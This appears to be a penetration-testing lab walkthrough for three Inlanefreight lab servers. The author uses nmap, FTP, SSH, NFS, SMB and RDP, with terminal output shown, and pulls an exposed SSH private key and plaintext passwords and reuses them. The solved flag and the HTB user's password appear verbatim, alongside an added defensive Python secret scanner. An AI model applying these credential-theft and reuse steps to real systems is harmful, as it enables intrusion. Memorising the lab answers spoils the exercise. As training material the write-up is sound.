FOOTPRINTING
FOOTPRINTING LAB: EASY
We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.
The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.
Additionally, our teammates have found the following credentials "ceil:qwer1234", and they pointed out that some of the company's employees were talking about SSH keys on a forum.
The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
root@htb:~$ sudo nmap -sS -T4 10.129.43.46 -p- -oA targetServices
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
2121/tcp open ccproxy-ftp
root@htb:~$ sudo nmap -sV -sC -T4 10.129.43.46 -p 21,22,53,2121 -oA targetServicesFull
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp ProFTPD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@htb:~$ ftp 10.129.43.46
Connected to 10.129.43.46.
220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.43.46]
Name (10.129.43.46:root): ceil
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||57361|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 root root 4096 Nov 10 2021 .
drwxr-xr-x 2 root root 4096 Nov 10 2021 ..
226 Transfer complete
root@htb:~$ ftp 10.129.43.46 -P 2121
Connected to 10.129.43.46.
220 ProFTPD Server (Ceil's FTP) [10.129.43.46]
Name (10.129.43.46:root): ceil
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||8950|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
226 Transfer complete
ftp> cd .ssh
250 CWD command successful
ftp> pwd
Remote directory: /.ssh
ftp> ls -la
229 Entering Extended Passive Mode (|||34025|)
150 Opening ASCII mode data connection for file list
drwx------ 2 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer complete
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||46706|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |*************************************************************************************************************************************************| 3381 1.92 MiB/s 00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (310.66 KiB/s)
ftp>
root@htb:~$ mv id_rsa target-id_rsa
root@htb:~$ ssh -i target-id_rsa [email protected]
hostkeys_find_by_key_hostfile: hostkeys_foreach failed for /home/htb-ac-53539/.ssh/known_hosts: Not a directory
The authenticity of host '10.129.43.46 (10.129.43.46)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/htb-ac-53539/.ssh/known_hosts).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'target-id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "target-id_rsa": bad permissions
[email protected]: Permission denied (publickey).
root@htb:~$ chmod 600 target-id_rsa
root@htb:~$ ssh -i target-id_rsa [email protected]
hostkeys_find_by_key_hostfile: hostkeys_foreach failed for /home/htb-ac-53539/.ssh/known_hosts: Not a directory
The authenticity of host '10.129.43.46 (10.129.43.46)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 08 Dec 2025 12:48:40 AM UTC
System load: 0.11 Processes: 161
Usage of /: 86.7% of 3.87GB Users logged in: 0
Memory usage: 12% IPv4 address for ens192: 10.129.43.46
Swap usage: 0%
=> / is using 86.7% of 3.87GB
118 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Nov 10 05:48:02 2021 from 10.10.14.20
ceil@NIXEASY:~$
ceil@NIXEASY:~$ find / -name "flag.txt" -type f 2>/dev/null
/home/flag/flag.txt
ceil@NIXEASY:~$ cat /home/flag/flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
FOOTPRINTING LAB: MEDIUM
This second server is one that everyone on the internal network has access to. In our discussion with our client, we pointed out that such servers are often among the main targets for attackers and that this server should be added to the scope.
Our customer agreed and added this server to our scope. Here, too, the goal remains the same: find out as much information as possible about this server and find ways to use it against the server itself. For the proof and protection of customer data, a user named HTB has been created. Accordingly, we need to obtain the credentials of this user as proof.
Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.
root@htb:~$ sudo nmap -sS -sV -sC -T4 10.129.202.41 -p-
PORT STATE SERVICE VERSION
111/tcp open rpcbind?
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WINMEDIUM
| NetBIOS_Domain_Name: WINMEDIUM
| NetBIOS_Computer_Name: WINMEDIUM
| DNS_Domain_Name: WINMEDIUM
| DNS_Computer_Name: WINMEDIUM
| Product_Version: 10.0.17763
|_ System_Time: 2025-12-15T00:30:40+00:00
|_ssl-date: 2025-12-15T00:30:48+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WINMEDIUM
| Not valid before: 2025-12-13T23:23:21
|_Not valid after: 2026-06-14T23:23:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-12-15T00:30:41
|_ start_date: N/A
root@htb:~$ sudo nmap --script=vuln -T4 10.129.202.41 -p 111,135,139,445,2049,3389,5985,47001,49664-49667,49678-49681
PORT STATE SERVICE
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
49681/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
root@htb:~$ sudo nmap --script nfs* 10.129.202.41 -p 111,2049
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /TechSupport
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwx------ 4294967294 4294967294 65536 2021-11-11T00:09:49 .
| ?????????? ? ? ? ? ..
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283649.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283650.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283651.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283652.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283653.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:28 ticket4238791283654.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:29 ticket4238791283655.txt
| rwx------ 4294967294 4294967294 0 2021-11-10T15:19:29 ticket4238791283656.txt
|_
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /TechSupport 25468924.0 15097604.0 10371320.0 60% 16.0T 1023
| nfs-showmount:
|_ /TechSupport
2049/tcp open nfs
root@oco:~$ showmount -e 10.129.202.41
Export list for 10.129.202.41:
/TechSupport (everyone)
root@oco:~$ mkdir targetNFS
root@oco:~$ sudo mount -t nfs 10.129.202.41:/TechSupport ./targetNFS/ -o nolock
root@oco:~$ cd targetNFS
bash: cd: targetNFS/: Permission denied
root@oco:~$ sudo su
root@oco:~$ cd targetNFS/
root@oco:~$ ls
ticket4238791283649.txt ticket4238791283671.txt ticket4238791283693.txt ticket4238791283715.txt ticket4238791283737.txt ticket4238791283759.txt ticket4238791283781.txt
ticket4238791283650.txt ticket4238791283672.txt ticket4238791283694.txt ticket4238791283716.txt ticket4238791283738.txt ticket4238791283760.txt ticket4238791283782.txt
ticket4238791283651.txt ticket4238791283673.txt ticket4238791283695.txt ticket4238791283717.txt ticket4238791283739.txt ticket4238791283761.txt ticket4238791283783.txt
ticket4238791283652.txt ticket4238791283674.txt ticket4238791283696.txt ticket4238791283718.txt ticket4238791283740.txt ticket4238791283762.txt ticket4238791283784.txt
ticket4238791283653.txt ticket4238791283675.txt ticket4238791283697.txt ticket4238791283719.txt ticket4238791283741.txt ticket4238791283763.txt ticket4238791283785.txt
ticket4238791283654.txt ticket4238791283676.txt ticket4238791283698.txt ticket4238791283720.txt ticket4238791283742.txt ticket4238791283764.txt ticket4238791283786.txt
ticket4238791283655.txt ticket4238791283677.txt ticket4238791283699.txt ticket4238791283721.txt ticket4238791283743.txt ticket4238791283765.txt ticket4238791283787.txt
ticket4238791283656.txt ticket4238791283678.txt ticket4238791283700.txt ticket4238791283722.txt ticket4238791283744.txt ticket4238791283766.txt ticket4238791283788.txt
ticket4238791283657.txt ticket4238791283679.txt ticket4238791283701.txt ticket4238791283723.txt ticket4238791283745.txt ticket4238791283767.txt ticket4238791283789.txt
ticket4238791283658.txt ticket4238791283680.txt ticket4238791283702.txt ticket4238791283724.txt ticket4238791283746.txt ticket4238791283768.txt ticket4238791283790.txt
ticket4238791283659.txt ticket4238791283681.txt ticket4238791283703.txt ticket4238791283725.txt ticket4238791283747.txt ticket4238791283769.txt ticket4238791283791.txt
ticket4238791283660.txt ticket4238791283682.txt ticket4238791283704.txt ticket4238791283726.txt ticket4238791283748.txt ticket4238791283770.txt ticket4238791283792.txt
ticket4238791283661.txt ticket4238791283683.txt ticket4238791283705.txt ticket4238791283727.txt ticket4238791283749.txt ticket4238791283771.txt ticket4238791283793.txt
ticket4238791283662.txt ticket4238791283684.txt ticket4238791283706.txt ticket4238791283728.txt ticket4238791283750.txt ticket4238791283772.txt ticket4238791283794.txt
ticket4238791283663.txt ticket4238791283685.txt ticket4238791283707.txt ticket4238791283729.txt ticket4238791283751.txt ticket4238791283773.txt ticket4238791283795.txt
ticket4238791283664.txt ticket4238791283686.txt ticket4238791283708.txt ticket4238791283730.txt ticket4238791283752.txt ticket4238791283774.txt ticket4238791283796.txt
ticket4238791283665.txt ticket4238791283687.txt ticket4238791283709.txt ticket4238791283731.txt ticket4238791283753.txt ticket4238791283775.txt ticket4238791283797.txt
ticket4238791283666.txt ticket4238791283688.txt ticket4238791283710.txt ticket4238791283732.txt ticket4238791283754.txt ticket4238791283776.txt ticket4238791283798.txt
ticket4238791283667.txt ticket4238791283689.txt ticket4238791283711.txt ticket4238791283733.txt ticket4238791283755.txt ticket4238791283777.txt ticket4238791283799.txt
ticket4238791283668.txt ticket4238791283690.txt ticket4238791283712.txt ticket4238791283734.txt ticket4238791283756.txt ticket4238791283778.txt ticket4238791283800.txt
ticket4238791283669.txt ticket4238791283691.txt ticket4238791283713.txt ticket4238791283735.txt ticket4238791283757.txt ticket4238791283779.txt ticket4238791283801.txt
ticket4238791283670.txt ticket4238791283692.txt ticket4238791283714.txt ticket4238791283736.txt ticket4238791283758.txt ticket4238791283780.txt
root@oco:~$ tree .
.
├── ticket4238791283649.txt
├── ticket4238791283650.txt
├── ticket4238791283651.txt
├── ticket4238791283652.txt
...
root@oco:~$ cat *
Conversation with InlaneFreight Ltd
Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello,.
So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:
smtp {
  host=smtp.web.dev.inlanefreight.htb
  #port=25
  ssl=true
  user="alex"
  password="lol123!mD"
  from="[email protected]"
}

securesocial {

  onLoginGoTo=/
  onLogoutGoTo=/login
  ssl=false

  userpass {
    withUserNameSupport=false
    sendWelcomeEmail=true
    enableGravatarSupport=true
    signupSkipLogin=true
    tokenDuration=60
    tokenDeleteInterval=5
    minimumPasswordLength=8
    enableTokenJob=true
    hasher=bcrypt
  }

  cookie {
    # name=id
    # path=/login
    # domain="10.129.2.59:9500"
    httpOnly=true
    makeTransient=false
    absoluteTimeoutInMinutes=1440
    idleTimeoutInMinutes=1440
  }
---
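Two of the findings above come down to secrets sitting in plain files on a shared export: the SMTP password pasted into a support ticket, and a world-readable id_rsa behind an FTP root. The following Python is an added example, not part of the original writeup, showing the kind of check a defender can run over a mounted export or FTP root before attackers do; it reports where secrets live without echoing them, and the sample files it scans are constructed in a temporary directory (the key is a placeholder header only).

```python
"""Scan a directory tree (a mounted NFS/SMB export, an FTP root) for
plaintext credentials and private keys, as surfaced in the lab above."""
import os
import re
import stat
import tempfile

# Patterns for the two leak types seen in this lab: a HOCON/ini-style
# password assignment and an unencrypted PEM private key header.
PASSWORD_RE = re.compile(
    r'^\s*(password|passwd|pwd)\s*[=:]\s*["\']?([^"\'\s]+)', re.I | re.M)
PRIVATE_KEY_RE = re.compile(r'-----BEGIN (?:RSA |OPENSSH |EC )?PRIVATE KEY-----')


def scan_tree(root):
    """Return a sorted list of (relative_path, finding) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            try:
                with open(path, 'rb') as fh:
                    data = fh.read(64 * 1024).decode('utf-8', 'replace')
            except OSError:
                continue
            if PRIVATE_KEY_RE.search(data):
                # Record the mode too: 0644 on a key is a finding in itself
                mode = stat.S_IMODE(os.stat(path).st_mode)
                findings.append((rel, 'private key (mode %04o)' % mode))
            for m in PASSWORD_RE.finditer(data):
                # Redact: report key name and length, never the secret itself
                findings.append((rel, 'plaintext %s (%d chars)'
                                 % (m.group(1).lower(), len(m.group(2)))))
    return sorted(findings)


def demo():
    """Build a constructed sample tree mirroring the lab and scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, '.ssh'))
    # Constructed ticket with a config snippet like the one pasted above
    with open(os.path.join(root, 'ticket0001.txt'), 'w') as fh:
        fh.write('smtp {\n  host=smtp.example.test\n  user="alex"\n'
                 '  password="NOT-A-REAL-SECRET"\n}\n')
    with open(os.path.join(root, 'ticket0002.txt'), 'w') as fh:
        fh.write('Printer on floor 2 is jammed again.\n')
    # Constructed placeholder key; only the header matters for detection
    key = os.path.join(root, '.ssh', 'id_rsa')
    with open(key, 'w') as fh:
        fh.write('-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n'
                 '-----END OPENSSH PRIVATE KEY-----\n')
    os.chmod(key, 0o644)  # world-readable, like the FTP-exposed key above
    return scan_tree(root)


if __name__ == '__main__':
    for rel, finding in demo():
        print(rel, '->', finding)
```

Pointing scan_tree() at the mounted targetNFS directory would flag the ticket holding alex's SMTP password; the same run over the FTP root on 2121 would flag .ssh/id_rsa.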
root@htb:~$ sudo umount /home/htb-ac-53539/targetNFS
umount.nfs4: /home/htb-ac-53539/targetNFS: device is busy
root@htb:~$ cd /home/htb-ac-53539
root@htb:~$ sudo umount /home/htb-ac-53539/targetNFS
root@htb:~$ exit
root@htb:~$ smbmap -H 10.129.202.41
[!] Authentication error on 10.129.202.41
root@htb:~$ smbmap -H 10.129.202.41 -u 'alex' -p 'lol123!mD'
[+] IP: 10.129.202.41:445 Name: 10.129.202.41
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
devshare READ, WRITE
IPC$ READ ONLY Remote IPC
Users READ ONLY
root@htb:~$ smbclient -L //10.129.202.41/ -U alex
Password for [WORKGROUP\alex]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
devshare Disk
IPC$ IPC Remote IPC
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.202.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
* If you get the error "Unable to connect with SMB1...", simply drop the -L from the command:
  - smbclient -L tries to list workgroups, which requires SMB1.
  - Modern Windows systems disable SMB1, so that fallback fails.
root@htb:~$ smbclient //10.129.202.41/users -U alex%lol123!mD
root@htb:~$ smbclient //10.129.180.37/devshare -U alex
Password for [WORKGROUP\alex]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Dec 14 20:13:58 2025
.. D 0 Sun Dec 14 20:13:58 2025
important.txt A 16 Wed Nov 10 10:12:55 2021
6367231 blocks of size 4096. 2592726 blocks available
smb: \> get important.txt
getting file \important.txt of size 16 as important.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
root@htb:~$ cat important.txt
sa:87N1ns@slls83
root@htb:~$ xfreerdp3 /u:alex /p:'lol123!mD' /v:10.129.130.86
[20:30:00:477] [196714:196715] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-53539/.config/freerdp
...
target:~$ Desktop > Microsoft SQL Server Management Studio 18 > Run as > Administrator
Password: 87N1ns@slls83
SQL Server
Server Type: Database Engine
Server Name: WINMEDIUM
Authentication: Windows Authentication
Connect...
SQL Server
Databases > Accounts > Tables > right-click dbo.devsacc
Edit Top 200 Rows
...
157 HTB lnch7ehrdn43i7AoqVPK4zWR
FOOTPRINTING LAB: HARD
The third server is an MX and management server for the internal network. In addition, this server acts as a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to obtain.